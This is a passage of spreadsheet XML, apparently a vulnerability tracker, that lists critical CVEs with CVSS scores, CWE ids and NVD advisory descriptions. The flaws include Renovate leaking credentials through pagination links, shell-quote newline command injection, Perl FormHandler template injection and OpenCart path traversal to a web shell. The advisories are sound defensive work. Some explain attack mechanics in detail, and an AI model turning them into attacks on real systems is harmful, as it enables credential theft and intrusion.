      <c r="E596" s="5" t="inlineStr"/>
      <c r="F596" s="5" t="inlineStr"/>
      <c r="G596" s="5" t="inlineStr">
        <is>
          <t>gitlab</t>
        </is>
      </c>
      <c r="H596" s="5" t="inlineStr"/>
      <c r="I596" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J596" s="5" t="inlineStr"/>
      <c r="K596" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="L596" s="5" t="inlineStr">
        <is>
          <t>Renovate before 44.11.3 fails to validate Link header destinations when following GitLab server pagination, allowing malicious servers to redirect credential-bearing requests. Attackers controlling a compromised GitLab server can specify a Link header pointing to attacker-controlled infrastructure to exfiltrate authentication credentials.</t>
        </is>
      </c>
      <c r="M596" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88880</t>
        </is>
      </c>
    </row>
    <row r="597">
      <c r="A597" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B597" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88881</t>
        </is>
      </c>
      <c r="C597" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D597" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E597" s="5" t="inlineStr"/>
      <c r="F597" s="5" t="inlineStr"/>
      <c r="G597" s="5" t="inlineStr"/>
      <c r="H597" s="5" t="inlineStr"/>
      <c r="I597" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J597" s="5" t="inlineStr"/>
      <c r="K597" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="L597" s="5" t="inlineStr">
        <is>
          <t>Renovate, a dependency update tool, follows pagination links supplied by the GitHub server in the HTTP `Link` header when interacting with GitHub.com, GitHub Enterprise Cloud, or GitHub Enterprise Server, and sends the credentials configured for that host to the URL given as the 'next' page. Because the pagination URL is not validated against the host originally contacted, a malicious or compromised GitHub server can return a `Link` header pointing to an attacker-controlled host and cause Renovate to disclose those credentials to it. Exploitation requires that the GitHub server Renovate talks to (as the repository host or as a datasource such as github-releases, github-tags, or git-refs) is already malicious or compromised. The issue is fixed in renovate 44.11.3 (npm and renovate/renovate container images), Mend Renovate CE/EE images and the mend-renovate-ce helm chart 15.4.0, and the mend-renovate-enterprise-edition helm chart 10.4.0. There is no workaround; the pre-existing RENOVATE_X_REBASE_PAGINATION_LINKS option disables the new host check and should only be used with servers that intentionally use different pagination hosts.</t>
        </is>
      </c>
      <c r="M597" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88881</t>
        </is>
      </c>
    </row>
    <row r="598">
      <c r="A598" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B598" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88882</t>
        </is>
      </c>
      <c r="C598" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D598" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E598" s="5" t="inlineStr"/>
      <c r="F598" s="5" t="inlineStr"/>
      <c r="G598" s="5" t="inlineStr"/>
      <c r="H598" s="5" t="inlineStr"/>
      <c r="I598" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J598" s="5" t="inlineStr"/>
      <c r="K598" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="L598" s="5" t="inlineStr">
        <is>
          <t>Renovate is a dependency update automation tool. In versions before 44.11.2 (and Mend Renovate CE/EE images and charts before 15.4.0, and mend-renovate-enterprise-edition helm chart before 10.4.0), when listing new package versions from a NuGet registry Renovate follows pagination URLs supplied by the registry in the HTTP `Link` header without verifying that the target has the same origin as the configured registry. Registry credentials are attached to the request for the 'next' page, so a malicious or compromised NuGet registry can return a `Link` header pointing at an attacker-controlled server and cause Renovate to send the registry credentials to that server. Exploitation requires the remote registry to be malicious or compromised; such a registry would normally already have received the credentials on the initial request, so the issue primarily allows the credentials to be delivered to an additional, attacker-chosen host. The fix restricts pagination to the same origin; the previous behaviour can be re-enabled with the RENOVATE_X_NUGET_PAGINATION_ALLOW_CROSS_ORIGIN option.</t>
        </is>
      </c>
      <c r="M598" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88882</t>
        </is>
      </c>
    </row>
    <row r="599">
      <c r="A599" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B599" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88887</t>
        </is>
      </c>
      <c r="C599" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D599" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E599" s="5" t="inlineStr"/>
      <c r="F599" s="5" t="inlineStr"/>
      <c r="G599" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H599" s="5" t="inlineStr"/>
      <c r="I599" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J599" s="5" t="inlineStr"/>
      <c r="K599" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="L599" s="5" t="inlineStr">
        <is>
          <t>Renovate is a dependency update automation tool. When listing tags/digests for a container image, Renovate follows pagination links supplied by the remote registry in the HTTP Link header and attaches the registry credentials to the follow-up request without verifying that the pagination URL has the same origin as the original registry. A malicious or compromised container registry can therefore specify a Link header pointing to an attacker-controlled host and receive the credentials Renovate uses for that registry. Exploitation requires that the target has container (Docker) dependencies and is already interacting with the malicious or compromised registry. This is fixed in Renovate 44.11.2 (npm and renovate/renovate images), Mend Renovate CE/EE 15.4.0 and the mend-renovate-enterprise-edition Helm chart 10.4.0; the same-origin check can be disabled with RENOVATE_X_DOCKER_PAGINATION_ALLOW_CROSS_ORIGIN.</t>
        </is>
      </c>
      <c r="M599" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88887</t>
        </is>
      </c>
    </row>
    <row r="600">
      <c r="A600" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B600" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89243</t>
        </is>
      </c>
      <c r="C600" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D600" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E600" s="5" t="inlineStr"/>
      <c r="F600" s="5" t="inlineStr"/>
      <c r="G600" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H600" s="5" t="inlineStr"/>
      <c r="I600" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J600" s="5" t="inlineStr"/>
      <c r="K600" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L600" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 contains a stored cross-site scripting vulnerability in UserGroups::setGroup_name() that fails to sanitize group_name input. Administrators with canAdminUserGroups permission can inject malicious HTML and JavaScript that executes in the browser when other administrators access the user manager interface.</t>
        </is>
      </c>
      <c r="M600" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89243</t>
        </is>
      </c>
    </row>
    <row r="601">
      <c r="A601" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B601" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9277</t>
        </is>
      </c>
      <c r="C601" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D601" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E601" s="5" t="inlineStr"/>
      <c r="F601" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G601" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H601" s="5" t="inlineStr"/>
      <c r="I601" s="5" t="inlineStr">
        <is>
          <t>2026-05-22</t>
        </is>
      </c>
      <c r="J601" s="5" t="inlineStr"/>
      <c r="K601" s="5" t="inlineStr">
        <is>
          <t>CWE-77, CWE-78</t>
        </is>
      </c>
      <c r="L601" s="5" t="inlineStr">
        <is>
          <t>shell-quote's `quote()` function did not validate object-token inputs against the operator model used by `parse()`. The `.op` field was backslash-escaped character by character using `/(.)/g`, which in JavaScript does not match line terminators (\n, \r, U+2028, U+2029). A line terminator in `.op` therefore passed through unescaped into the output; POSIX shells treat a literal newline as a command separator, so any content after it would execute as a second command. The vulnerable code path is reachable in two ways: (1) direct construction of `{ op: '...\n...' }` from external input, and (2) via `parse(cmd, envFn)` when `envFn` returns object tokens whose `.op` is attacker-influenced. Both are documented API surface. Fixed by replacing the per-character escape with strict shape validation: `.op` must match the parser's control-operator allowlist; `{ op: 'glob', pattern }` validates `pattern` and forbids line terminators; `{ comment }` validates `comment` and forbids line terminators; any other object shape throws `TypeError`.</t>
        </is>
      </c>
      <c r="M601" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9277</t>
        </is>
      </c>
    </row>
    <row r="602">
      <c r="A602" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B602" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9317</t>
        </is>
      </c>
      <c r="C602" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D602" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E602" s="5" t="inlineStr"/>
      <c r="F602" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G602" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H602" s="5" t="inlineStr"/>
      <c r="I602" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J602" s="5" t="inlineStr"/>
      <c r="K602" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L602" s="5" t="inlineStr">
        <is>
          <t>Nango before 0.71.6 contains a missing authentication vulnerability in the runner tRPC server that allows unauthenticated attackers to execute arbitrary JavaScript code by invoking the exposed start procedure without credentials. Attackers with network access to the runner port can send requests to the unauthenticated start procedure, bypassing the unenforced RUNNER_SECRET_KEY environment variable, to achieve remote code execution within the runner process.</t>
        </is>
      </c>
      <c r="M602" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9317</t>
        </is>
      </c>
    </row>
    <row r="603">
      <c r="A603" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B603" s="5" t="inlineStr">
        <is>
          <t>CVE-2022-4993</t>
        </is>
      </c>
      <c r="C603" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D603" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E603" s="5" t="inlineStr"/>
      <c r="F603" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G603" s="5" t="inlineStr"/>
      <c r="H603" s="5" t="inlineStr"/>
      <c r="I603" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J603" s="5" t="inlineStr"/>
      <c r="K603" s="5" t="inlineStr">
        <is>
          <t>CWE-1336, CWE-470</t>
        </is>
      </c>
      <c r="L603" s="5" t="inlineStr">
        <is>
          <t>HTML::FormHandler versions before 0.410000 for Perl allow attacker selected method dispatch and resource exhaustion because _apply_actions and add_error use error message text built from request data as a Locale::Maketext bracket notation template.
add_error hands its first argument to the language handle as the Locale::Maketext message key, and the default handle's lexicon sets `_AUTO`, so a string that is not a lexicon entry is compiled as a bracket notation template instead of being looked up. In a bracket group the first token names a method called on the language handle and the remaining tokens are its arguments.
Three kinds of text the library did not author reach that position. _apply_actions installs a `$SIG{__WARN__}` handler that stores the warning text in `$error_message`, and a captured warning survives a successful action, so a field carrying a numeric transform turns `Argument "[sprintf,%50000000d,0]" isn't numeric` into the template; a warning quotes the submitted value verbatim, so the group is well formed and dispatches. `$error_message ||= $tobj-&gt;validate($new_value)` takes a type constraint's own failure message, which renders the rejected value through a partial dumper in bracket and comma form (Devel::PartialDump when Moose can load it, Type::Tiny's own dumper always), so a field with `apply =&gt; [ Str ]` given a parameter sent more than once, which arrives as an array, gets `Reference ["a","b"] did not pass type constraint "Str"` as its template, from a request that carries no bracket character of its own. A coercion or transform exception reaches it the same way. Beyond those, a validator whose message contains the field value puts that value in the template directly, and add_error replaces the message list with the contents of an arrayref first argument (`@message = @{$message[0]} if ref $message[0] eq 'ARRAY'`), so a value arriving as an array fills the argument slots from the same request as well.
A malformed group such as `[0]` makes the compile croak, and HTML::FormHandler::I18N::maketext and add_error each re-raise that as a die, so process() throws. A well formed group naming sprintf reaches CORE::sprintf with an attacker chosen field width. Any caller that applies a type constraint or a transform to an untrusted field, or whose validator passes an untrusted field value to add_error, can be made to throw an unhandled exception out of process(), or to allocate an arbitrary amount of memory in one request, and an application whose language handle subclass defines side effecting public methods makes those callable with attacker chosen arguments. The dumped type constraint message is bounded to the exception, because both dumpers quote non-numeric elements so the method slot is never an attacker chosen name. The built-in messages pass fixed templates with the value in an argument slot, where it stays inert, and the built-in field types attach explicit message callbacks, so neither is affected.</t>
        </is>
      </c>
      <c r="M603" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2022-4993</t>
        </is>
      </c>
    </row>
    <row r="604">
      <c r="A604" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B604" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-49794</t>
        </is>
      </c>
      <c r="C604" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D604" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E604" s="5" t="inlineStr"/>
      <c r="F604" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G604" s="5" t="inlineStr"/>
      <c r="H604" s="5" t="inlineStr"/>
      <c r="I604" s="5" t="inlineStr">
        <is>
          <t>2025-06-16</t>
        </is>
      </c>
      <c r="J604" s="5" t="inlineStr"/>
      <c r="K604" s="5" t="inlineStr">
        <is>
          <t>CWE-825</t>
        </is>
      </c>
      <c r="L604" s="5" t="inlineStr">
        <is>
          <t>A use-after-free vulnerability was found in libxml2. This issue occurs when parsing XPath elements under certain circumstances when the XML schematron has the &lt;sch:name path="..."/&gt; schema elements. This flaw allows a malicious actor to craft a malicious XML document used as input for libxml, resulting in the program's crash using libxml or other possible undefined behaviors.</t>
        </is>
      </c>
      <c r="M604" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-49794</t>
        </is>
      </c>
    </row>
    <row r="605">
      <c r="A605" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B605" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-49796</t>
        </is>
      </c>
      <c r="C605" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D605" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E605" s="5" t="inlineStr"/>
      <c r="F605" s="5" t="n">
        <v>0.015</v>
      </c>
      <c r="G605" s="5" t="inlineStr"/>
      <c r="H605" s="5" t="inlineStr"/>
      <c r="I605" s="5" t="inlineStr">
        <is>
          <t>2025-06-16</t>
        </is>
      </c>
      <c r="J605" s="5" t="inlineStr"/>
      <c r="K605" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L605" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in libxml2. Processing certain sch:name elements from the input XML file can trigger a memory corruption issue. This flaw allows an attacker to craft a malicious XML input file that can lead libxml to crash, resulting in a denial of service or other possible undefined behavior due to sensitive data being corrupted in memory.</t>
        </is>
      </c>
      <c r="M605" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-49796</t>
        </is>
      </c>
    </row>
    <row r="606">
      <c r="A606" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B606" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-51679</t>
        </is>
      </c>
      <c r="C606" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D606" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E606" s="5" t="inlineStr"/>
      <c r="F606" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G606" s="5" t="inlineStr"/>
      <c r="H606" s="5" t="inlineStr"/>
      <c r="I606" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J606" s="5" t="inlineStr"/>
      <c r="K606" s="5" t="inlineStr">
        <is>
          <t>CWE-1281</t>
        </is>
      </c>
      <c r="L606" s="5" t="inlineStr">
        <is>
          <t>An issue was discovered in openRISC OR1200 commit 83ac6b. A mismatch between the RTL and netlist can lead to unexpected behavior.</t>
        </is>
      </c>
      <c r="M606" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-51679</t>
        </is>
      </c>
    </row>
    <row r="607">
      <c r="A607" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B607" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-70146</t>
        </is>
      </c>
      <c r="C607" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D607" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E607" s="5" t="inlineStr"/>
      <c r="F607" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G607" s="5" t="inlineStr"/>
      <c r="H607" s="5" t="inlineStr">
        <is>
          <t>projectworlds:online_time_table_generator</t>
        </is>
      </c>
      <c r="I607" s="5" t="inlineStr">
        <is>
          <t>2026-02-18</t>
        </is>
      </c>
      <c r="J607" s="5" t="inlineStr"/>
      <c r="K607" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-862</t>
        </is>
      </c>
      <c r="L607" s="5" t="inlineStr">
        <is>
          <t>Missing authentication in multiple administrative action scripts under /admin/ in ProjectWorlds Online Time Table Generator 1.0 allows remote attackers to perform unauthorized administrative operations (e.g.,adding records, deleting records) via direct HTTP requests to affected endpoints without a valid session.</t>
        </is>
      </c>
      <c r="M607" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-70146</t>
        </is>
      </c>
    </row>
    <row r="608">
      <c r="A608" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B608" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-10059</t>
        </is>
      </c>
      <c r="C608" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D608" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E608" s="5" t="inlineStr"/>
      <c r="F608" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G608" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="H608" s="5" t="inlineStr"/>
      <c r="I608" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J608" s="5" t="inlineStr"/>
      <c r="K608" s="5" t="inlineStr">
        <is>
          <t>CWE-266</t>
        </is>
      </c>
      <c r="L608" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the Multicluster Engine for Kubernetes ClusterCurator controller. A tenant administrator with namespace-scoped privileges can exploit this vulnerability by creating a namespaced ClusterCurator. This action inadvertently grants the tenant administrator the ability to mint a token for a ServiceAccount with cluster-wide administrative authority. This leads to a privilege escalation, allowing the tenant administrator to gain full control over the cluster.</t>
        </is>
      </c>
      <c r="M608" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-10059</t>
        </is>
      </c>
    </row>
    <row r="609">
      <c r="A609" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B609" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-13221</t>
        </is>
      </c>
      <c r="C609" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D609" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E609" s="5" t="inlineStr"/>
      <c r="F609" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G609" s="5" t="inlineStr"/>
      <c r="H609" s="5" t="inlineStr">
        <is>
          <t>perl:perl</t>
        </is>
      </c>
      <c r="I609" s="5" t="inlineStr">
        <is>
          <t>2026-07-13</t>
        </is>
      </c>
      <c r="J609" s="5" t="inlineStr"/>
      <c r="K609" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L609" s="5" t="inlineStr">
        <is>
          <t>Perl versions before 5.40.5-RC1, from 5.41.0 before 5.42.3-RC1, from 5.43.0 before 5.43.10 produce silently incorrect regular expression matches when an alternation of more than 65535 fixed string branches is compiled into a trie in Perl_study_chunk.
When such branches are combined into a trie, the delta between the first branch and the shared tail is stored in a 16-bit field. A branch count above 65535 overflows the field, and the trie's match decision table is truncated with no warning or error.
A pattern of this shape produces false positive matches (matching strings it should not) and false negative matches (failing to match strings it should). When such a pattern gates an access or filtering decision, the result is wrong.</t>
        </is>
      </c>
      <c r="M609" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-13221</t>
        </is>
      </c>
    </row>
    <row r="610">
      <c r="A610" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B610" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16272</t>
        </is>
      </c>
      <c r="C610" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D610" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E610" s="5" t="inlineStr"/>
      <c r="F610" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G610" s="5" t="inlineStr"/>
      <c r="H610" s="5" t="inlineStr"/>
      <c r="I610" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J610" s="5" t="inlineStr"/>
      <c r="K610" s="5" t="inlineStr">
        <is>
          <t>CWE-348</t>
        </is>
      </c>
      <c r="L610" s="5" t="inlineStr">
        <is>
          <t>Use of less trusted source vulnerability in PayTR Payment and Electronic Money Institution Inc. PayTR Virtual Pos iFrame API (v9x) WHMCS Module allows Exploitation of Trusted Identifiers.
This issue affects PayTR Virtual Pos iFrame API (v9x) WHMCS Module: from v9.0.0 before v9.0.3.</t>
        </is>
      </c>
      <c r="M610" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16272</t>
        </is>
      </c>
    </row>
    <row r="611">
      <c r="A611" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B611" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16503</t>
        </is>
      </c>
      <c r="C611" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D611" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E611" s="5" t="inlineStr"/>
      <c r="F611" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G611" s="5" t="inlineStr">
        <is>
          <t>docker, postgresql</t>
        </is>
      </c>
      <c r="H611" s="5" t="inlineStr"/>
      <c r="I611" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J611" s="5" t="inlineStr"/>
      <c r="K611" s="5" t="inlineStr">
        <is>
          <t>CWE-1188, CWE-1327, CWE-1393</t>
        </is>
      </c>
      <c r="L611" s="5" t="inlineStr">
        <is>
          <t>Deployment of the VPS.org one-click Supabase template deploys a PostgreSQL instance that is published on all interfaces (0.0.0.0:5432) with a default database password set to "postgres". Because Docker installs its own iptables rules, this exposure bypasses a standard host UFW configuration.</t>
        </is>
      </c>
      <c r="M611" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16503</t>
        </is>
      </c>
    </row>
    <row r="612">
      <c r="A612" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B612" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17057</t>
        </is>
      </c>
      <c r="C612" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D612" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E612" s="5" t="inlineStr"/>
      <c r="F612" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G612" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H612" s="5" t="inlineStr">
        <is>
          <t>ibm:i</t>
        </is>
      </c>
      <c r="I612" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J612" s="5" t="inlineStr"/>
      <c r="K612" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L612" s="5" t="inlineStr">
        <is>
          <t>IBM i 7.6, 7.5, 7.4, and 7.3 could allow a remote attacker to cause a denial of service and affect data integrity due to missing authentication for critical functions.</t>
        </is>
      </c>
      <c r="M612" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17057</t>
        </is>
      </c>
    </row>
    <row r="613">
      <c r="A613" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B613" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17207</t>
        </is>
      </c>
      <c r="C613" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D613" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E613" s="5" t="inlineStr"/>
      <c r="F613" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G613" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H613" s="5" t="inlineStr">
        <is>
          <t>ibm:i</t>
        </is>
      </c>
      <c r="I613" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J613" s="5" t="inlineStr"/>
      <c r="K613" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L613" s="5" t="inlineStr">
        <is>
          <t>IBM i 7.6, 7.5, 7.4, and 7.3 could allow a remote attacker to cause a denial of service and compromise integrity due to a buffer overflow.</t>
        </is>
      </c>
      <c r="M613" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17207</t>
        </is>
      </c>
    </row>
    <row r="614">
      <c r="A614" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B614" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18412</t>
        </is>
      </c>
      <c r="C614" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D614" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E614" s="5" t="inlineStr"/>
      <c r="F614" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G614" s="5" t="inlineStr"/>
      <c r="H614" s="5" t="inlineStr"/>
      <c r="I614" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J614" s="5" t="inlineStr"/>
      <c r="K614" s="5" t="inlineStr"/>
      <c r="L614" s="5" t="inlineStr">
        <is>
          <t>OpenCart extensions are uploaded as zip files with .ocmod.zip extensions. Upon installation, the OpenCart v4.2.0.0 extension installer extracts these zip files, but does not validate that the extracted paths stay inside the intended extraction directory. An attacker can craft a malicious extension containing file path traversal sequences, such as ../. With this vulnerability, an attacker can write files, such as a PHP web shell, into the webroot directory.</t>
        </is>
      </c>
      <c r="M614" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18412</t>
        </is>
      </c>
    </row>
    <row r="615">
      <c r="A615" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B615" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18753</t>
        </is>
      </c>
      <c r="C615" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D615" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E615" s="5" t="inlineStr"/>
      <c r="F615" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G615" s="5" t="inlineStr"/>
      <c r="H615" s="5" t="inlineStr"/>
      <c r="I615" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J615" s="5" t="inlineStr"/>
      <c r="K615" s="5" t="inlineStr">
        <is>
          <t>CWE-321</t>
        </is>
      </c>
      <c r="L615" s="5" t="inlineStr">
        <is>
          <t>The
product firmware contains an embedded, static RSA private key utilized by the
Lighttpd web server for TLS termination. Exposure of this private key allows
malicious actors to breach the confidentiality and integrity of HTTPS
communications, enabling traffic decryption and server spoofing.</t>
        </is>
      </c>
      <c r="M615" s="6" t="inlineStr">
        <is>
